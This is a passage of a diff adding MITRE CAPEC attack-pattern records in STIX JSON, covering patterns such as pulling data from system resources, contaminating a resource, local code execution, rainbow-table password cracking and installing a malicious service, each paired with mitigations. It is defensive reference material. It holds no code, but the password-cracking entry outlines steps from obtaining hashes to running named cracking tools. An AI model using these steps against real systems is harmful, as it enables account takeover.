"2022-09-29T00:00:00.000Z", + "name": "Counterfeit Organizations", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--862d18f1-a87c-4f1b-acc2-882697d5d6e5" + ], + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_prerequisites": [ + "None" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary who is authorized or has the ability to search known system resources, does so with the intention of gathering useful information. System resources include files, memory, and other aspects of the target system. In this pattern of attack, the adversary does not necessarily know what they are going to find when they start pulling data. This is different than CAPEC-150 where the adversary knows what they are looking for due to the common location.", + "external_references": [ + { + "external_id": "CAPEC-545", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/545.html" + }, + { + "external_id": "CWE-1239", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1239.html" + }, + { + "external_id": "CWE-1243", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1243.html" + }, + { + "external_id": "CWE-1258", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1258.html" + }, + { + "external_id": "CWE-1266", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1266.html" + }, + { + "external_id": "CWE-1272", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1272.html" + }, + { + "external_id": "CWE-1278", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1278.html" + }, + { + "external_id": "CWE-1323", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1323.html" + }, + { + "external_id": "CWE-1258", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1258.html" + }, + { + "external_id": "CWE-1330", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1330.html" + }, + { + "description": "Data from Local System", + "external_id": "T1005", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1005" + }, + { + "description": "Credentials from Password Stores:Keychain", + "external_id": "T1555.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1555/001" + } + ], + "id": "attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Pull Data from System Resources", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "attack-pattern--9d08b257-08f6-42e3-ad7e-41aaf07789a1", + "attack-pattern--056a463d-6303-438e-a43f-992cee52fb95" + ], + "x_capec_child_of_refs": [ + "attack-pattern--913426fa-ea1f-43b0-8492-1d363ea109d6" + ], + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--1b75b059-c9ee-4c4d-b016-bafb20cce96b", + "attack-pattern--ed3de4d7-a053-42e4-9f3d-3a6293034e96", + "attack-pattern--a7ed6b37-4ede-4c34-bbb2-c422fb844d74", + "attack-pattern--9a7492fa-b46e-48bc-aae9-beb1d359171e" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary obtains unauthorized information due to insecure or incomplete data deletion in a multi-tenant environment. If a cloud provider fails to completely delete storage and data from former cloud tenants' systems/resources, once these resources are allocated to new, potentially malicious tenants, the latter can probe the provided resources for sensitive information still there.", + "external_references": [ + { + "external_id": "CAPEC-546", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/546.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "external_id": "CWE-1266", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1266.html" + }, + { + "external_id": "CWE-1272", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1272.html" + }, + { + "description": "Kopo M. Ramokapane, Awais Rashid, Jose M. Such, Assured Deletion in the Cloud: Requirements, Challenges and Future Directions, Association for Computing Machinery (ACM), Proceedings of the 2016 ACM on Cloud Computing Security Workshop", + "external_id": "REF-461", + "source_name": "reference_from_CAPEC", + "url": "https://nms.kcl.ac.uk/jose.such/pubs/Assured_deletion.pdf" + } + ], + "id": "attack-pattern--ed3de4d7-a053-42e4-9f3d-3a6293034e96", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Incomplete Data Deletion in a Multi-Tenant Environment", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (A successful attack that probes application memory will compromise the confidentiality of that data.)" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The cloud provider must not assuredly delete part or all of the sensitive data for which they are responsible.The adversary must have the ability to interact with the system." + ], + "x_capec_skills_required": { + "Low": "The adversary requires the ability to traverse directory structure." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Cloud providers should completely delete data to render it irrecoverable and inaccessible from any layer and component of infrastructure resources.", + "id": "course-of-action--65cd08b2-0269-4a7f-bdf4-e03d2d8374a3", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-546-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e1ffd89f-d766-48a7-b7d3-8d46fe11517b", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--65cd08b2-0269-4a7f-bdf4-e03d2d8374a3", + "spec_version": "2.1", + "target_ref": "attack-pattern--ed3de4d7-a053-42e4-9f3d-3a6293034e96", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Deletion of data should be completed promptly when requested.", + "id": "course-of-action--47ef1ed0-a199-4d71-86a7-db3c41ded30d", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-546-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fd548983-e701-4e46-9b7c-cfc9318fd925", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--47ef1ed0-a199-4d71-86a7-db3c41ded30d", + "spec_version": "2.1", + "target_ref": "attack-pattern--ed3de4d7-a053-42e4-9f3d-3a6293034e96", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary conducts a physical attack a device or component, destroying it such that it no longer functions as intended.", + "external_references": [ + { + "external_id": "CAPEC-547", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/547.html" + } + ], + "id": "attack-pattern--475af086-5223-4210-910a-5217445c0c23", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Physical Destruction of Device or Component", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--576968ad-12ef-46d8-bb10-63f496bcaccb" + ], + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary contaminates organizational information systems (including devices and networks) by causing them to handle information of a classification/sensitivity for which they have not been authorized. When this happens, the contaminated information system, device, or network must be brought offline to investigate and mitigate the data spill, which denies availability of the system until the investigation is complete.", + "external_references": [ + { + "external_id": "CAPEC-548", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/548.html" + }, + { + "description": "Florida Industrial Security Working Group (FISWG), Managing a “Data Spill”", + "external_id": "REF-742", + "source_name": "reference_from_CAPEC", + "url": "https://fiswg.research.ucf.edu/Documents/PPT/Manage%20a%20Data%20Spill-Contamination%20September%202015.pptx" + }, + { + "description": "data spillage", + "external_id": "REF-743", + "source_name": "reference_from_CAPEC", + "url": "https://csrc.nist.gov/glossary/term/data_spillage" + } + ], + "id": "attack-pattern--61546d1a-d720-4609-89ca-12039268d502", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Contaminate Resource", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_alternate_terms": [ + "Data Spill" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--576968ad-12ef-46d8-bb10-63f496bcaccb" + ], + "x_capec_consequences": { + "Availability": [ + "Resource Consumption (Denial of Service)" + ], + "Confidentiality": [ + "Read Data (Victims of the attack can be exposed to classified materials)" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n An insider threat was able to obtain a classified document. They have knowledge that a backend server which provides access to a website also runs a mail server. The adversary creates a throwaway email address and sends the classified document to the mail server. When an administrator checks the mail server they notice that it has processed an email with a classified document and the server has to be taken offline while they investigate the contamination. In the meantime, the website has to be taken down as well and access to the website is denied until the backend can be migrated to another server or the investigation is complete.\n " + ], + "x_capec_extended_description": "Contamination through email is a very common attack vector. Systems with email servers or personal work systems using email are susceptible to this attack simply by receiving an email that contains a classified document or information. A fake classified document could even be used that is mistaken as true classified material. This would still cause the system to be taken offline until the validity of the classified material is confirmed.", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary needs to have real or fake classified/sensitive information to place on a system" + ], + "x_capec_skills_required": { + "High": "The ability to obtain a classified document or information", + "Low": "The ability to fake a classified document" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Properly safeguard classified/sensitive data. This includes training cleared individuals to ensure they are handling and disposing of this data properly, as well as ensuring systems only handle information of the classification level they are designed for.", + "id": "course-of-action--0aa74751-a02e-4235-a93e-f1aa62ed6b84", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-548-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--bdc4a136-d354-493f-8f25-63839ff4a8e4", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0aa74751-a02e-4235-a93e-f1aa62ed6b84", + "spec_version": "2.1", + "target_ref": "attack-pattern--61546d1a-d720-4609-89ca-12039268d502", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design systems with redundancy in mind. This could mean creating backing servers that could be switched over to in the event that a server has to be taken down for investigation.", + "id": "course-of-action--5b0aac03-449e-47df-ad66-ee4ec2e0a095", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-548-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--817175b0-aa5c-4f89-97d8-45df37bc0eec", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5b0aac03-449e-47df-ad66-ee4ec2e0a095", + "spec_version": "2.1", + "target_ref": "attack-pattern--61546d1a-d720-4609-89ca-12039268d502", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Have a planned and efficient response plan to limit the amount of time a system is offline while the contamination is investigated.", + "id": "course-of-action--e121b3bf-219b-44cd-8130-05d74a7f55f8", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-548-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a768119c-043b-4f7d-afb8-079be4beb9ae", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e121b3bf-219b-44cd-8130-05d74a7f55f8", + "spec_version": "2.1", + "target_ref": "attack-pattern--61546d1a-d720-4609-89ca-12039268d502", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary installs and executes malicious code on the target system in an effort to achieve a negative technical impact. Examples include rootkits, ransomware, spyware, adware, and others.", + "external_references": [ + { + "external_id": "CAPEC-549", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/549.html" + }, + { + "external_id": "CWE-829", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/829.html" + } + ], + "id": "attack-pattern--2c74d7f3-ccb4-4aea-b7fc-8a4da900ec80", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Local Execution of Code", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_can_follow_refs": [ + "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "attack-pattern--056a463d-6303-438e-a43f-992cee52fb95" + ], + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Other (Depending on the type of code executed by the adversary, the consequences of this attack pattern can vary widely.)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Other (Depending on the type of code executed by the adversary, the consequences of this attack pattern can vary widely.)" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Other (Depending on the type of code executed by the adversary, the consequences of this attack pattern can vary widely.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "BlueBorne refers to a set of nine vulnerabilities on different platforms (Linux, Windows, Android, iOS) that offer an adversary the ability to install and execute malicious code on a system if they were close in proximity to a Bluetooth enabled device. One vulnerability affecting iOS versions 7 through 9 allowed an attacker to overflow the Low Energy Audio Protocol since commands sent over this protocol are improperly validated and gain the elevated permissions of the Bluetooth stack. These vulnerabilities were a result of poor validation and were patched shortly after their exposure in 2017, but many non-updated devices remain vulnerable." + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--482cb9fc-0122-49f0-b6df-6d2d42098b0a" + ], + "x_capec_prerequisites": [ + "Knowledge of the target system's vulnerabilities that can be capitalized on with malicious code.The adversary must be able to place the malicious code on the target system." + ], + "x_capec_resources_required": [ + "The means by which the adversary intends to place the malicious code on the system dictates the tools required. For example, suppose the adversary wishes to leverage social engineering and convince a legitimate user to open a malicious file attached to a seemingly legitimate email. In this case, the adversary might require a tool capable of wrapping malicious code into an innocuous filetype (e.g., PDF, .doc, etc.)" + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Employ robust cybersecurity training for all employees.", + "id": "course-of-action--48d83564-0b90-4cb8-8edc-629d4918b8d3", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-549-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3ad56f58-fb37-408f-8a1b-2e3dfa28a602", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--48d83564-0b90-4cb8-8edc-629d4918b8d3", + "spec_version": "2.1", + "target_ref": "attack-pattern--2c74d7f3-ccb4-4aea-b7fc-8a4da900ec80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement system antivirus software that scans all attachments before opening them.", + "id": "course-of-action--bf8bf5fa-93a1-46a0-8d7c-6889986d5167", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-549-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3b1a3ebf-0fe8-4635-a763-7180f98545ce", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bf8bf5fa-93a1-46a0-8d7c-6889986d5167", + "spec_version": "2.1", + "target_ref": "attack-pattern--2c74d7f3-ccb4-4aea-b7fc-8a4da900ec80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Regularly patch all software.", + "id": "course-of-action--6637d129-28e5-4beb-9e50-e0127d76b7ec", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-549-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--281bf316-0912-4859-9ffe-bb8474a7bad4", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6637d129-28e5-4beb-9e50-e0127d76b7ec", + "spec_version": "2.1", + "target_ref": "attack-pattern--2c74d7f3-ccb4-4aea-b7fc-8a4da900ec80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Execute all suspicious files in a sandbox environment.", + "id": "course-of-action--d0e49c00-06b2-426e-a1dc-9aaeb4cafb97", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-549-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--05a27f3b-76b2-4510-9609-7f3d05b0d792", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d0e49c00-06b2-426e-a1dc-9aaeb4cafb97", + "spec_version": "2.1", + "target_ref": "attack-pattern--2c74d7f3-ccb4-4aea-b7fc-8a4da900ec80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker gets access to the database table where hashes of passwords are stored. They then use a rainbow table of pre-computed hash chains to attempt to look up the original password. Once the original password corresponding to the hash is obtained, the attacker uses the original password to gain access to the system.", + "external_references": [ + { + "external_id": "CAPEC-55", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/55.html" + }, + { + "external_id": "CWE-261", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/261.html" + }, + { + "external_id": "CWE-521", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/521.html" + }, + { + "external_id": "CWE-262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html" + }, + { + "external_id": "CWE-263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html" + }, + { + "external_id": "CWE-654", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/654.html" + }, + { + "external_id": "CWE-916", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/916.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-309", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/309.html" + }, + { + "description": "Brute Force:Password Cracking", + "external_id": "T1110.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1110/002" + } + ], + "id": "attack-pattern--a390cb72-b4de-4750-ae05-be556c89f4be", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Rainbow Table Password Cracking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "BusyBox 1.1.1 does not use a salt when generating passwords, which makes it easier for local users to guess passwords from a stolen password file using techniques such as rainbow tables. See also: CVE-2006-1058" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine application's/system's password policy: Determine the password policies of the target application/system.

    2. Techniques
    Determine minimum and maximum allowed password lengths.
    Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc.).
    Determine account lockout policy (a strict account lockout policy will prevent brute force attacks).

  2. Obtain password hashes: An attacker gets access to the database table storing hashes of passwords or potentially just discovers a hash of an individual password.

    3. Techniques
    Obtain copy of database table or flat file containing password hashes (by breaking access controls, using SQL Injection, etc.)
    Obtain password hashes from platform-specific storage locations (e.g. Windows registry)
    Sniff network packets containing password hashes.

Exploit

  1. Run rainbow table-based password cracking tool: An attacker finds or writes a password cracking tool that uses a previously computed rainbow table for the right hashing algorithm. It helps if the attacker knows what hashing algorithm was used by the password system.

    2. Techniques
    Run rainbow table-based password cracking tool such as Ophcrack or RainbowCrack. Reduction function must depend on application's/system's password policy.
", + "x_capec_extended_description": "\n A password rainbow table stores hash chains for various passwords. A password chain is computed, starting from the original password, P, via a reduce(compression) function R and a hash function H. A recurrence relation exists where Xi+1 = R(H(Xi)), X0 = P. Then the hash chain of length n for the original password P can be formed: X1, X2, X3, ... , Xn-2, Xn-1, Xn, H(Xn). P and H(Xn) are then stored together in the rainbow table. Constructing the rainbow tables takes a very long time and is computationally expensive. A separate table needs to be constructed for the various hash algorithms (e.g. SHA1, MD5, etc.). However, once a rainbow table is computed, it can be very effective in cracking the passwords that have been hashed without the use of salt.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Hash of the original password is available to the attacker. For a better chance of success, an attacker should have more than one hash of the original password, and ideally the whole table.", + "Salt was not used to create the hash of the original password. Otherwise the rainbow tables have to be re-computed, which is very expensive and will make the attack effectively infeasible (especially if salt was added in iterations).", + "The system uses one factor password based authentication." + ], + "x_capec_resources_required": [ + "Rainbow table of password hash chains with the right algorithm used. A password cracking tool that leverages this rainbow table will also be required. Hash(es) of the password is required." + ], + "x_capec_skills_required": { + "Low": "A variety of password cracking tools are available that can leverage a rainbow table. The more difficult part is to obtain the password hash(es) in the first place." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use salt when computing password hashes. That is, concatenate the salt (random bits) with the original password prior to hashing it.", + "id": "course-of-action--54756aa7-5cd0-4c09-90b0-4bcb64715e00", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-55-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--59fee1cf-5b04-404d-9ef4-ed4d63ce8317", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--54756aa7-5cd0-4c09-90b0-4bcb64715e00", + "spec_version": "2.1", + "target_ref": "attack-pattern--a390cb72-b4de-4750-ae05-be556c89f4be", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "When an operating system starts, it also starts programs called services or daemons. Adversaries may install a new service which will be executed at startup (on a Windows system, by modifying the registry). The service name may be disguised by using a name from a related operating system or benign software. Services are usually run with elevated privileges.", + "external_references": [ + { + "external_id": "CAPEC-550", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/550.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "description": "Create or Modify System Process", + "external_id": "T1543", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1543" + } + ], + "id": "attack-pattern--aef8e9e0-4714-4890-9470-06276c61abfd", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Install New Service", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--482cb9fc-0122-49f0-b6df-6d2d42098b0a" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": 